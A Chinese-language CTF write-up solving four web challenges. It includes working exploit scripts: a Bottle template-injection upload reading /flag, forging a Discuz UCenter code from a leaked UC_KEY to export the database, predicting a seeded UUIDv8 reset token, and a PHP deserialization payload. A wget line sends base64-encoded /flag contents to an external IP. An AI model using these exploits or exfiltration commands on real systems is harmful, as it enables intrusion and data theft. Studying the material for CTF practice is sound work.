ez_bottle
源码
from bottle import route, run, template, post, request, static_file, error
import os
import zipfile
import hashlib
import time
# hint: flag in /flag , have a try
# Directory that contains this module; uploads and static assets live beside it.
_APP_ROOT = os.path.dirname(__file__)

# Every upload is extracted into its own sub-directory of UPLOAD_DIR.
UPLOAD_DIR = os.path.join(_APP_ROOT, 'uploads')
os.makedirs(UPLOAD_DIR, exist_ok=True)
STATIC_DIR = os.path.join(_APP_ROOT, 'static')

# Upper bound (1 MiB) on the size of an uploaded archive.
MAX_FILE_SIZE = 1024 * 1024

# Substrings that must not occur in a file before it is rendered as a template.
BLACK_DICT = [
    "{", "}", "os", "eval", "exec", "sock",
    "<", ">", "bul", "class", "?", ":",
    "bash", "_", "globals", "get", "open",
]
def contains_blacklist(content):
    """Return True when *content* contains any substring listed in BLACK_DICT.

    The check is a plain, case-sensitive substring search.
    """
    return any(black in content for black in BLACK_DICT)
def is_symlink(zipinfo):
    """Return True when a ZIP entry's recorded mode marks it as a symbolic link.

    The upper 16 bits of ``external_attr`` are read as a Unix ``st_mode``.
    """
    import stat

    unix_mode = zipinfo.external_attr >> 16
    # S_ISLNK compares the file-type bits against S_IFLNK (0o120000).
    return stat.S_ISLNK(unix_mode)
def is_safe_path(base_dir, target_path):
    """Return True when *target_path* resolves to *base_dir* or a path inside it.

    Both paths are resolved with ``os.path.realpath`` first.  The comparison is
    made on whole path components, so a sibling such as ``/x/uploads_evil`` is
    not mistaken for a child of ``/x/uploads`` (a plain ``startswith`` check
    would accept it).
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(target_path)
    try:
        return os.path.commonpath([base, target]) == base
    except ValueError:
        # commonpath() refuses paths that cannot share a root (e.g. different
        # drives on Windows); such a target is never inside base_dir.
        return False
@route('/')
def index():
    """Serve ``index.html`` from STATIC_DIR."""
    return static_file('index.html', root=STATIC_DIR)
@route('/static/<filename>')
def server_static(filename):
    """Serve the static asset called *filename* from STATIC_DIR."""
    return static_file(filename, root=STATIC_DIR)
@route('/upload')
def upload_page():
    """Serve ``upload.html`` from STATIC_DIR for GET requests to /upload."""
    return static_file('upload.html', root=STATIC_DIR)
@post('/upload')
def upload():
    """Accept a ZIP upload, vet its entries, extract it and list the result.

    The archive is stored as ``upload.zip`` inside a fresh directory named
    after the MD5 of ``filename + current time``.  Every entry is checked for
    symlinks and for paths escaping that directory before anything is
    extracted.

    Returns:
        A short plain-text message: either the reason the upload was rejected,
        or the rendered list of extracted files plus a ``/view/...`` link.
    """
    zip_file = request.files.get('file')
    if not zip_file or not zip_file.filename.endswith('.zip'):
        return 'Invalid file. Please upload a ZIP file.'
    # Read at most one byte past the limit, so an oversized upload is rejected
    # without buffering all of it in memory.
    if len(zip_file.file.read(MAX_FILE_SIZE + 1)) > MAX_FILE_SIZE:
        return 'File size exceeds 1MB. Please upload a smaller ZIP file.'
    zip_file.file.seek(0)

    current_time = str(time.time())
    unique_string = zip_file.filename + current_time
    md5_hash = hashlib.md5(unique_string.encode()).hexdigest()
    extract_dir = os.path.join(UPLOAD_DIR, md5_hash)
    os.makedirs(extract_dir)
    zip_path = os.path.join(extract_dir, 'upload.zip')
    zip_file.save(zip_path)

    try:
        with zipfile.ZipFile(zip_path, 'r') as z:
            # Vet every entry first; extraction happens only if all pass.
            for file_info in z.infolist():
                if is_symlink(file_info):
                    return 'Symbolic links are not allowed.'
                real_dest_path = os.path.realpath(os.path.join(extract_dir, file_info.filename))
                if not is_safe_path(extract_dir, real_dest_path):
                    return 'Path traversal detected.'
            z.extractall(extract_dir)
    except zipfile.BadZipFile:
        return 'Invalid ZIP file.'

    files = os.listdir(extract_dir)
    files.remove('upload.zip')
    return template("文件列表: {{files}}\n访问: /view/{{md5}}/{{first_file}}",
                    files=", ".join(files), md5=md5_hash, first_file=files[0] if files else "nofile")
@route('/view/<md5>/<filename>')
def view_file(md5, filename):
    """Render an extracted file as a bottle template and return the output.

    The file is rejected when its text contains a BLACK_DICT substring.  Any
    exception raised while rendering is caught and its message is returned in
    the response body.
    """
    file_path = os.path.join(UPLOAD_DIR, md5, filename)
    # isfile() rather than exists(): a directory would pass exists() and then
    # make open() raise.
    if not os.path.isfile(file_path):
        return "File not found."
    with open(file_path, 'r', encoding='utf-8') as f:
        content = f.read()
    if contains_blacklist(content):
        return "you are hacker!!!nonono!!!"
    try:
        # SECURITY: `content` is attacker-supplied and is evaluated as a
        # template.  The substring blacklist does not make this safe: lines
        # starting with "%" run as Python, and the exception text below is
        # echoed back to the client.
        return template(content)
    except Exception as e:
        return f"Error rendering template: {str(e)}"
@error(404)
def error404(error):
    """Return the fixed body used for HTTP 404 responses."""
    return "bbbbbboooottle"
@error(403)
def error403(error):
    """Return the fixed body used for HTTP 403 responses."""
    return "Forbidden: You don't have permission to access this resource."
if __name__ == '__main__':
    # Listen on every interface, port 5000, with bottle's debug mode off.
    run(host='0.0.0.0', port=5000, debug=False)
黑名单
BLACK_DICT = ["{", "}", "os", "eval", "exec", "sock", "<", ">", "bul", "class", "?", ":", "bash", "_", "globals",
"get", "open"]
绕过检测后利用
template(content)
前端页面没有提供上传文件的入口,因此自己构造 exp,直接向 /upload 发送 POST 请求
import requests
import zipfile
import io
import re

URL = "http://gz.imxbt.cn:20791"  # <- change this to the challenge's actual URL

# Build the payload
payload = """% import configparser
% c = configparser.ConfigParser()
% c.read('/flag')
% raise Exception('\\n'.join(c.sections()))"""

# Pack the payload into an in-memory zip
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, "w", zipfile.ZIP_DEFLATED) as zf:
    zf.writestr("exp.tpl", payload)
zip_buffer.seek(0)

# Upload
files = {"file": ("exp.zip", zip_buffer, "application/zip")}
resp = requests.post(URL + "/upload", files=files)
print("[*] Upload response:\n", resp.text)

# Extract the md5 directory and the file name from the returned /view link
m = re.search(r"/view/([0-9a-f]+)/([^ \n]+)", resp.text)
if not m:
    print("[-] Upload failed, could not extract view link.")
    # SystemExit works without the `site` module's exit() helper and
    # reports failure through a non-zero status.
    raise SystemExit(1)
md5, fname = m.groups()
print(f"[*] Extracted md5={md5}, fname={fname}")

# Request the view page
resp = requests.get(f"{URL}/view/{md5}/{fname}")
print("[*] View response:\n", resp.text)
payload1
% import configparser
% c = configparser.ConfigParser()
% c.read('/flag')
% raise Exception('\\n'.join(c.sections()))
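利用 configparser(配置文件解析模块)把 /flag 当作 ini 文件解析,再通过抛出异常把内容带出来:view_file 捕获异常后会把异常信息回显到页面。另外,如果 /flag 里没有 [section] 头,c.read 本身就会抛出 MissingSectionHeaderError,其异常信息中会包含出错的那一行内容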
payload2
% import fileinput
% a = ''.join(fileinput.input('/flag'))
% raise Exception(a)
利用 fileinput 模块:它可以把文件当作输入流逐行读取。
打开 /flag 文件,把所有行拼接成一个字符串赋给 a,
再抛出异常,把文件内容作为异常信息输出(view_file 会把异常信息回显到页面)
Payload3
import shutil; shutil.copy('/flag', './aaa')
复制路径下文件内容到另一路径
此题做法还有很多,就不一一列举了
我曾有一份工作
Discuz x3.5
扫描扫到www.zip
下载,代码审计
在/api/source/config/config_ucenter.php
发现泄露了UC_KEY
define('UC_KEY', 'N8ear1n0q4s646UeZeod130eLdlbqfs1BbRd447eq866gaUdmek7v2D9r9EeS6vb');
去搜索一下Discuz x3.5
看到题目提示
一次备份,换来的是一张辞职信
flag 在 pre_a_flag 表里
flag 在 pre_a_flag 表内,所以思路可能是 SQL 注入,或者是数据库内容泄露之类的
做法
拿到 UC_KEY → 生成 code → 调用 export → 导出 SQL → 下载
Discuz!/UCenter 的 API 请求是靠 code 参数鉴权的。
code 的生成方式参考源码(用 UC_KEY 做 authcode 加密),最后用生成的 code 去触发 export
if($get['method'] == 'export') {
$db->query('SET SQL_QUOTE_SHOW_CREATE=0', 'SILENT');
$time = date("Y-m-d H:i:s", $timestamp);
$tables = array();
$tables = arraykeys2(fetchtablelist($tablepre), 'Name');
if($apptype == 'discuz') {
$query = $db->query("SELECT datatables FROM {$tablepre}plugins WHERE datatables<>''");
while($plugin = $db->fetch_array($query)) {
foreach(explode(',', $plugin['datatables']) as $table) {
if($table = trim($table)) {
$tables[] = $table;
}
}
}
}
if($apptype == 'discuzx') {
$query = $db->query("SELECT datatables FROM {$tablepre}common_plugin WHERE datatables<>''");
while($plugin = $db->fetch_array($query)) {
foreach(explode(',', $plugin['datatables']) as $table) {
if($table = trim($table)) {
$tables[] = $table;
}
}
}
}
$memberexist = array_search("{$tablepre}common_member", $tables);
if($memberexist !== FALSE) {
unset($tables[$memberexist]);
array_unshift($tables, "{$tablepre}common_member");
}
$get['volume'] = isset($get['volume']) ? intval($get['volume']) : 0;
$get['volume'] = $get['volume'] + 1;
$version = $version ? $version : $apptype;
$idstring = '# Identify: '.base64_encode("$timestamp,$version,$apptype,multivol,{$get['volume']}")."\n";
if(!isset($get['sqlpath']) || empty($get['sqlpath'])) {
$get['sqlpath'] = 'backup_'.date('ymd', $timestamp).'_'.random(6);
if(!mkdir(BACKUP_DIR.'./'.$get['sqlpath'], 0777)) {
api_msg('mkdir_error', 'make dir error:'.BACKUP_DIR.'./'.$get['sqlpath']);
}
} else {
$get['sqlpath'] = str_replace(array('/', '\\', '.', "'"), '', $get['sqlpath']);
if(!is_dir(BACKUP_DIR.'./'.$get['sqlpath'])) {
if(!mkdir(BACKUP_DIR.'./'.$get['sqlpath'], 0777)) {
api_msg('mkdir_error', 'make dir error:'.BACKUP_DIR.'./'.$get['sqlpath']);
}
}
}
if(!isset($get['backupfilename']) || empty($get['backupfilename'])) {
$get['backupfilename'] = date('ymd', $timestamp).'_'.random(6);
}
$sqldump = '';
$get['tableid'] = isset($get['tableid']) ? intval($get['tableid']) : 0;
$get['startfrom'] = isset($get['startfrom']) ? intval($get['startfrom']) : 0;
if(!$get['tableid'] && $get['volume'] == 1) {
foreach($tables as $table) {
$sqldump .= sqldumptablestruct($table);
}
}
备份文件会被写到
BACKUP_DIR . '/' . $sqlpath . '/' . $backupfilename . '.sql'
在 Discuz! X 的默认配置里,BACKUP_DIR 是
./data/backup_uc/
这个目录位于站点根目录的 data/ 下,本质上是 Web 可以直接访问的目录。
备份文件同样可以被直接访问,所以拿到接口返回的路径后,就可以把备份文件下载下来
伪造code
<?php
// Key used by _authcode() below whenever no explicit $key is passed in.
define('UC_KEY', 'N8ear1n0q4s646UeZeod130eLdlbqfs1BbRd447eq866gaUdmek7v2D9r9EeS6vb');
/**
 * Encode or decode a string with a key-derived, RC4-style XOR stream.
 *
 * @param string $string    Plain text (ENCODE) or an encoded token (DECODE).
 * @param string $operation 'DECODE' to decode; any other value encodes.
 * @param string $key       Secret; UC_KEY is used when this is empty.
 * @param int    $expiry    Lifetime in seconds for ENCODE; 0 means no expiry.
 * @return string Decoded text ('' when the expiry or checksum test fails), or
 *                the encoded token when encoding.
 */
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
// Length of the per-token prefix ($keyc) carried in front of the base64 data.
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
// $keya feeds the stream key, $keyb feeds the integrity checksum.
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
// DECODE reads $keyc from the token; ENCODE derives it from md5(microtime()).
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
// ENCODE prepends a 10-digit expiry timestamp and a 16-char checksum to the text.
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
// Repeat the stream key's bytes to fill a 256-entry table.
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
// Key scheduling: permute $box under control of $rndkey.
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
// Keystream generation: XOR each input byte with a byte drawn from $box.
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == 'DECODE') {
// Accept only when the expiry is 0 or still in the future AND the checksum matches.
if(((int)substr($result, 0, 10) == 0 || (int)substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) === substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
// Token layout: $keyc followed by the base64 data with '=' padding removed.
return $keyc.str_replace('=', '', base64_encode($result));
}
}
/**
 * Flatten an array into "&key=value" pairs and encode the result with UC_KEY.
 *
 * Keys and values are concatenated as-is; no URL-encoding is applied.
 *
 * @param array $get Parameters to place inside the code.
 * @return string Token produced by _authcode() in ENCODE mode.
 */
function encode_arr($get) {
    $pairs = array();
    foreach ($get as $name => $value) {
        $pairs[] = '&'.$name.'='.$value;
    }
    return _authcode(implode('', $pairs), 'ENCODE', UC_KEY);
}
// Build the code for method=export, stamped with the current time, and print it.
$get = array(
    'time' => time(),
    'method' => 'export',
);
$res = encode_arr($get);
echo $res;
把备份文件下载下来之后,
对其中 pre_a_flag 表的数据做 hex 解码即可得到 flag
Ekko_note
源码
# -*- encoding: utf-8 -*-
'''
@File : app.py
@Time : 2066/07/05 19:20:29
@Author : Ekko exec inc. 某牛马程序员
'''
import os
import time
import uuid
import requests
from functools import wraps
from datetime import datetime
from secrets import token_urlsafe
from flask_sqlalchemy import SQLAlchemy
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, render_template, redirect, url_for, request, flash, session
# Wall-clock time captured when the module is imported.
SERVER_START_TIME = time.time()

# (author's note) Oops, these two lines were only for testing and never got
# removed.  Oh well, it is already released.  Nothing in the program uses the
# random library anyway, so it should be fine.
# NOTE(review): this seeds the process-wide RNG with SERVER_START_TIME, so any
# library code that draws from `random` becomes predictable to whoever knows
# that value.
import random
random.seed(SERVER_START_TIME)

admin_super_strong_password = token_urlsafe()

app = Flask(__name__)
# NOTE(review): SECRET_KEY is a hard-coded placeholder value.
app.config.update(
    SECRET_KEY='your-secret-key-here',
    SQLALCHEMY_DATABASE_URI='sqlite:///site.db',
    SQLALCHEMY_TRACK_MODIFICATIONS=False,
)
db = SQLAlchemy(app)
class User(db.Model):
    """Account row: credentials, admin flag and the per-user time API URL."""

    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(20), unique=True, nullable=False)
    email = db.Column(db.String(120), unique=True, nullable=False)
    # Stores the hash produced by generate_password_hash, never the plain text.
    password = db.Column(db.String(60), nullable=False)
    is_admin = db.Column(db.Boolean, default=False)
    # URL that check_time_api() fetches on behalf of this user.
    time_api = db.Column(db.String(200), default='https://api.uuni.cn//api/time')
class PasswordResetToken(db.Model):
    """Password-reset token issued for a user; ``used`` marks it as consumed."""

    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    token = db.Column(db.String(36), unique=True, nullable=False)
    used = db.Column(db.Boolean, default=False)
def padding(input_string):
    """Convert a string to a 48-bit integer built from its first 6 UTF-8 bytes.

    Longer input is truncated to 6 bytes and shorter input is right-padded
    with NUL bytes; the 6 bytes are then read as a big-endian integer.
    """
    first_six = input_string.encode('utf-8')[:6]
    return int.from_bytes(first_six.ljust(6, b'\x00'), byteorder='big')
# Create the tables and, on first start only, the admin account.  Its
# password is the random admin_super_strong_password generated at import time.
with app.app_context():
    db.create_all()
    if not User.query.filter_by(username='admin').first():
        admin = User(
            username='admin',
            email='admin@example.com',
            password=generate_password_hash(admin_super_strong_password),
            is_admin=True
        )
        db.session.add(admin)
        db.session.commit()
def login_required(f):
    """Decorator: redirect to the login page unless the session has a user_id."""
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash('请登录', 'danger')
            return redirect(url_for('login'))
        return f(*args, **kwargs)
    return decorated_function
def admin_required(f):
    """Decorator: allow the view only for a logged-in user whose row is admin.

    The admin flag is read from the database on every request, not from the
    session.
    """
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash('请登录', 'danger')
            return redirect(url_for('login'))
        user = User.query.get(session['user_id'])
        # A session can outlive its user row; treat a missing user as non-admin
        # instead of failing on `None.is_admin`.
        if user is None or not user.is_admin:
            flash('你不是admin', 'danger')
            return redirect(url_for('home'))
        return f(*args, **kwargs)
    return decorated_function
def check_time_api():
    """Ask the current user's time API whether the year is 2066 or later.

    Returns:
        True or False when the API answers with a parseable ``date`` field;
        None when the request fails, the reply cannot be parsed, or ``date``
        is missing or empty.
    """
    user = User.query.get(session['user_id'])
    try:
        # SECURITY: the URL is stored per user and is fetched server-side
        # without any validation.  The timeout keeps a dead or slow endpoint
        # from blocking the worker forever.
        response = requests.get(user.time_api, timeout=5)
        data = response.json()
        datetime_str = data.get('date')
        if datetime_str:
            print(datetime_str)
            current_time = datetime.fromisoformat(datetime_str)
            return current_time.year >= 2066
    except Exception:
        # Deliberately best-effort: any failure is reported as "API down".
        return None
    return None
@app.route('/')
def home():
    """Render the landing page."""
    return render_template('home.html')
@app.route('/server_info')
@login_required
def server_info():
    """Return the server start time and the current time to a logged-in user.

    NOTE(review): ``server_start_time`` is the value the process-wide RNG was
    seeded with, so this endpoint hands that seed to any registered user.
    """
    return {
        'server_start_time': SERVER_START_TIME,
        'current_time': time.time()
    }
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Show the registration form (GET) or create a new account (POST).

    A POST is rejected with a flash message when a field is missing, the two
    passwords differ, or the username or e-mail is already taken.
    """
    if request.method == 'POST':
        username = request.form.get('username')
        email = request.form.get('email')
        password = request.form.get('password')
        confirm_password = request.form.get('confirm_password')
        # Missing fields arrive as None and would otherwise crash password
        # hashing or violate the NOT NULL columns.
        if not username or not email or not password:
            flash('请填写完整信息', 'danger')
            return redirect(url_for('register'))
        if password != confirm_password:
            flash('密码错误', 'danger')
            return redirect(url_for('register'))
        existing_user = User.query.filter_by(username=username).first()
        if existing_user:
            flash('已经存在这个用户了', 'danger')
            return redirect(url_for('register'))
        existing_email = User.query.filter_by(email=email).first()
        if existing_email:
            flash('这个邮箱已经被注册了', 'danger')
            return redirect(url_for('register'))
        hashed_password = generate_password_hash(password)
        new_user = User(username=username, email=email, password=hashed_password)
        db.session.add(new_user)
        db.session.commit()
        flash('注册成功,请登录', 'success')
        return redirect(url_for('login'))
    return render_template('register.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Show the login form (GET) or authenticate and fill the session (POST)."""
    if request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')
        user = User.query.filter_by(username=username).first()
        # `password` is None when the field is absent; checking it first keeps
        # check_password_hash from being called with None.
        if user and password and check_password_hash(user.password, password):
            session['user_id'] = user.id
            session['username'] = user.username
            session['is_admin'] = user.is_admin
            flash('登陆成功,欢迎!', 'success')
            return redirect(url_for('dashboard'))
        else:
            flash('用户名或密码错误!', 'danger')
            return redirect(url_for('login'))
    return render_template('login.html')
@app.route('/logout')
@login_required
def logout():
    """Clear the session and redirect to the home page."""
    session.clear()
    flash('成功登出', 'info')
    return redirect(url_for('home'))
@app.route('/dashboard')
@login_required
def dashboard():
    """Render the dashboard for a logged-in user."""
    return render_template('dashboard.html')
@app.route('/forgot_password', methods=['GET', 'POST'])
def forgot_password():
    """Show the form (GET) or issue a reset token for the given e-mail (POST).

    The token is stored in PasswordResetToken; nothing is actually mailed.
    """
    if request.method == 'POST':
        email = request.form.get('email')
        user = User.query.filter_by(email=email).first()
        if user:
            # Which UUID version to pick... such a headache >_<
            # Let's go with UUID v8, it looks like the newest one.
            # SECURITY: only `a` is supplied here, and it is derived from the
            # username.  NOTE(review): the remaining bits presumably come from
            # the `random` module, which this app seeds with a value it also
            # publishes - confirm against the uuid.uuid8 documentation.
            token = str(uuid.uuid8(a=padding(user.username)))  # oh, it takes custom parameters - put the username in then
            reset_token = PasswordResetToken(user_id=user.id, token=token)
            db.session.add(reset_token)
            db.session.commit()
            # TODO: write an SMTP service that sends the token out
            flash('密码恢复token已经发送,请检查你的邮箱', 'info')
            return redirect(url_for('reset_password'))
        else:
            flash('没有找到该邮箱对应的注册账户', 'danger')
            return redirect(url_for('forgot_password'))
    return render_template('forgot_password.html')
@app.route('/reset_password', methods=['GET', 'POST'])
def reset_password():
    """Show the form (GET) or set a new password from a valid token (POST).

    A token is valid when it exists and has not been used; it is marked used
    once the password has been changed.
    """
    if request.method == 'POST':
        token = request.form.get('token')
        new_password = request.form.get('new_password')
        confirm_password = request.form.get('confirm_password')
        if new_password != confirm_password:
            flash('密码不匹配', 'danger')
            return redirect(url_for('reset_password'))
        reset_token = PasswordResetToken.query.filter_by(token=token, used=False).first()
        if reset_token:
            user = User.query.get(reset_token.user_id)
            user.password = generate_password_hash(new_password)
            reset_token.used = True
            db.session.commit()
            flash('成功重置密码!请重新登录', 'success')
            return redirect(url_for('login'))
        else:
            flash('无效或过期的token', 'danger')
            return redirect(url_for('reset_password'))
    return render_template('reset_password.html')
@app.route('/execute_command', methods=['GET', 'POST'])
@login_required
def execute_command():
    """Run a submitted shell command once the time API reports year >= 2066.

    The view is gated by check_time_api(): None means the API failed, False
    means the reported year is before 2066.  Both redirect to the dashboard.
    """
    result = check_time_api()
    if result is None:
        flash("API死了啦,都你害的啦。", "danger")
        return redirect(url_for('dashboard'))
    if not result:
        flash('2066年才完工哈,你可以穿越到2066年看看', 'danger')
        return redirect(url_for('dashboard'))
    if request.method == 'POST':
        command = request.form.get('command')
        # SECURITY: the form value is passed to the shell unchanged, which is
        # arbitrary command execution for any user who reaches this line.
        os.system(command)  # What? Security? Look, I said it isn't finished yet, stop rushing me.
        return redirect(url_for('execute_command'))
    return render_template('execute_command.html')
@app.route('/admin/settings', methods=['GET', 'POST'])
@admin_required
def admin_settings():
    """Show (GET) or update (POST) the admin's time API URL."""
    user = User.query.get(session['user_id'])
    if request.method == 'POST':
        new_api = request.form.get('time_api')
        # SECURITY: the URL is stored as submitted and later fetched by
        # check_time_api(), so the admin decides what the server requests.
        user.time_api = new_api
        db.session.commit()
        flash('成功更新API!', 'success')
        return redirect(url_for('admin_settings'))
    return render_template('admin_settings.html', time_api=user.time_api)
if __name__ == '__main__':
    # Listen on every interface with Flask's debug mode off.
    app.run(debug=False, host="0.0.0.0")
大概审计一下:首先要拿到 admin 身份,这需要伪造密码重置 token,然后用它修改 admin 的密码,登录后就是管理员了。
之后还要让时间 API 返回 2066 年及以后的时间,才能进入 execute_command,利用 os.system 读取 flag 文件。关键在于 token 怎么伪造
看到token的生成逻辑
if user:
# 选哪个UUID版本好呢,好头疼 >_<
# UUID v8吧,看起来版本比较新
token = str(uuid.uuid8(a=padding(user.username))) # 可以自定义参数吗原来,那把username放进去吧
reset_token = PasswordResetToken(user_id=user.id, token=token)
db.session.add(reset_token)
db.session.commit()
# TODO:写一个SMTP服务把token发出去
flash(f'密码恢复token已经发送,请检查你的邮箱', 'info')
return redirect(url_for('reset_password'))
uuid.uuid8(),同时参数a利用到了padding函数,跟进
def padding(input_string):
    """Convert a string to a 48-bit integer built from its first 6 UTF-8 bytes.

    Longer input is truncated to 6 bytes and shorter input is right-padded
    with NUL bytes; the 6 bytes are then read as a big-endian integer.
    """
    first_six = input_string.encode('utf-8')[:6]
    return int.from_bytes(first_six.ljust(6, b'\x00'), byteorder='big')
翻阅官方文档可以看到,Python 3.14 新增了
uuid.uuid8(a=None, b=None, c=None)
a: 一个 48 位的整数。
b: 一个 12 位的整数。
c: 一个 62 位的整数。
没有指定的参数会用 random 库生成的伪随机数补上,而 random 的 seed(即 SERVER_START_TIME)我们是可以拿到的
不难看到
SERVER_START_TIME = time.time()
@app.route('/server_info')
@login_required
def server_info():
return {
'server_start_time': SERVER_START_TIME,
'current_time': time.time()
然后在源码中可以看到admin邮箱
admin@example.com
然后写脚本伪造token
import random
import uuid
def padding(input_string: str) -> int:
    """Must stay identical to the server-side implementation.

    Takes the first 6 UTF-8 bytes of *input_string*, right-pads them with NUL
    bytes to 6 bytes, and reads the result as a big-endian integer.
    """
    first_six = input_string.encode('utf-8')[:6]
    return int.from_bytes(first_six.ljust(6, b'\x00'), byteorder='big')
def predict_reset_token(server_start_time: float, username: str) -> str:
    """Predict the UUIDv8 reset token from server_start_time and username.

    Requires a Python version that provides ``uuid.uuid8``.  Note that this
    reseeds the process-wide ``random`` state.
    NOTE(review): the result matches the server only if nothing there has
    drawn from ``random`` between seeding and token creation - confirm.
    """
    # Put the local RNG in the same state as the server's
    random.seed(server_start_time)
    # username -> padding -> the `a` parameter
    a_param = padding(username)
    # b and c are left to `random`, because the server does not pass them
    token = str(uuid.uuid8(a=a_param))
    return token
if __name__ == "__main__":
    # server_start_time as returned by /server_info
    server_start_time = 1755797128.8635294
    username = "admin"
    token = predict_reset_token(server_start_time, username)
    print("[*] Predicted reset token:")
    print(token)
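然后用预测出的 token 修改 admin 密码并登录即可。
接下来需要让时间 API 返回 2066 年之后的时间:在 VPS 上搭一个返回固定时间的 HTTP 服务,
再在 /admin/settings 把 time_api 改成这个服务的地址,就能通过时间检查、获得 execute_command 的使用权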
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
class MyHandler(BaseHTTPRequestHandler):
    """Answer every GET with a JSON document carrying a fixed date in 2066."""

    def do_GET(self):
        """Send ``{"date": "2066-01-01T00:00:00"}`` with a 200 status."""
        # Always return the same fixed time in the year 2066
        body = json.dumps({"date": "2066-01-01T00:00:00"}).encode()
        self.send_response(200)
        self.send_header("Content-type", "application/json")
        # Announce the body length so clients need not wait for the close.
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
if __name__ == "__main__":
    server_address = ("0.0.0.0", 8000)  # listen on port 8000 on the VPS
    httpd = HTTPServer(server_address, MyHandler)
    print("Serving on port 8000...")
    httpd.serve_forever()
然后就可以输入命令去读了
wget "http://38.55.99.179:8000?data=$(cat /flag | base64 -w 0)"
Your Uns3r
源码
<?php
highlight_file(__FILE__);
// Entry object of the chain: its destructor leads to include().
class User
{
public $username;
// Expected to hold a serialized string; exec() unserializes it.
public $value;
// Unserialize $value (with a serialize/unserialize round trip) and include
// the path returned by getToken() when the result is an Access object.
public function exec()
{
$ser = unserialize(serialize(unserialize($this->value)));
// Loose comparison between the unserialized result and the raw $value.
if ($ser != $this->value && $ser instanceof Access) {
// SECURITY: the included path is built from unserialized, caller-supplied data.
include($ser->getToken());
}
}
public function __destruct()
{
// Loose comparison (==): $username is not required to be a string.
if ($this->username == "admin") {
$this->exec();
}
}
}
// Builds the path that User::exec() passes to include().
class Access
{
protected $prefix;
protected $suffix;
// Return $prefix . 'lilctf' . $suffix.
// Throws Exception when either part is not a string, or when the combined
// result contains 'pearcmd'.
public function getToken()
{
if (!is_string($this->prefix) || !is_string($this->suffix)) {
throw new Exception("Go to HELL!");
}
$result = $this->prefix . 'lilctf' . $this->suffix;
if (strpos($result, 'pearcmd') !== false) {
throw new Exception("Can I have peachcmd?");
}
return $result;
}
}
// Raw serialized payload taken from the POST field "user".
$ser = $_POST["user"];
// Rejected only when BOTH substrings are present in the raw payload.
if (strpos($ser, 'admin') !== false && strpos($ser, 'Access":') !== false) {
exit ("no way!!!!");
}
$user = unserialize($ser);
// The script always ends by throwing after unserialize().
throw new Exception("nonono!!!");
考点:GC 回收机制(让 __destruct 在抛出异常之前提前触发)、include 的目录拼接(路径穿越),还有字符串检测绕过(可用十六进制绕过;下面的 exp 则利用弱比较,令 username=true)
<?php
// Payload generator: prints a URL-encoded serialized array for the "user" field.
// Local stand-ins for the target's classes; only the property layout is needed.
class User
{
public $username;
public $value;
}
class Access
{
// getToken() joins these as '/' . 'lilctf' . '/../flag'.
protected $prefix='/';
protected $suffix='/../flag';
}
$a=new Access();
$b=new User();
// Boolean true passes the target's loose `== "admin"` test, so the literal
// string 'admin' never appears in the payload.
$b->username=true;
$b->value=serialize($a);
// Wrap the User in a two-element array: [0 => User, 1 => 0].
$d=array($b,0);
$c=serialize($d);
echo "\n";
// Rewrite the second element's key from 1 to 0, so it overwrites the User at index 0.
$e=str_replace('i:1;i:0;','i:0;i:0;',$c);
echo "\n";
// urlencode keeps the NUL bytes of the protected property names intact.
echo urlencode($e);
User->value 存放 Access 的序列化结果(保证二次反序列化时能得到 Access 对象)。
构造数组并篡改索引,让 User 对象在反序列化过程中被覆盖,从而提前执行 __destruct()。
在 __destruct() 中触发 exec(),最终通过 include 读取 /flag 文件。